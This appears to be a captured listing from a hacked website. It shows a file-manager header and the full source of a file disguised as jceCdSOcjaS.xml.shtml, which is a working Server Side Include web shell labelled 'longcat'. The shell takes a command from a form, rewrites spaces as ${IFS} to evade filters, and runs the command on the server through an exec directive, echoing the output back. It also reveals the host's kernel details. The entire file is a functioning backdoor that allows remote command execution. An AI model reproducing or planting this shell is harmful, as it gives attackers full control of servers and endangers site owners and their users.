Your IP : 216.73.216.218


Current Path : /proc/thread-self/root/proc/thread-self/root/home/antonen/poznajlitwe.lt/tmp/
Upload File :
Current File : //proc/thread-self/root/proc/thread-self/root/home/antonen/poznajlitwe.lt/tmp/jceCdSOcjaS.xml.shtml

						<!-- longcat here -->
						<!--#config errmsg="[Error in shell]"-->
						<script>
						function fex(){
							var uri=document.getElementById('command').value;
							var rep=uri.replace(/[ ]/g,'${IFS}');
							document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
						}
						document.onkeydown=function(e){
							if(!e)e=event;
							if(e.keyCode===13){
								var uri=document.getElementById('command').value;
								var rep=uri.replace(/[ ]/g,'${IFS}');
								document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
							}
						}
						</script><o>vuln</o>
						<font size="2">
						Server : <!--#exec cmd="uname -nr" --><br>
						GMT date : <!--#echo var=DATE_GMT --><br>
						Local date : <!--#echo var=DATE_LOCAL --><br>
						Document URI : <!--#echo var=DOCUMENT_URI --><br>
						Last modified : <!--#echo var=LAST_MODIFIED --><br><br>
						Command : <input type="text" size="30" id="command">
						<input type="button" value="Execute" onclick="fex();">
						<hr>
						Executed Command : <b><!--#echo var="QUERY_STRING_UNESCAPED" --></b><br>
						<textarea id="output"><!--#exec cmd="$QUERY_STRING_UNESCAPED" --></textarea>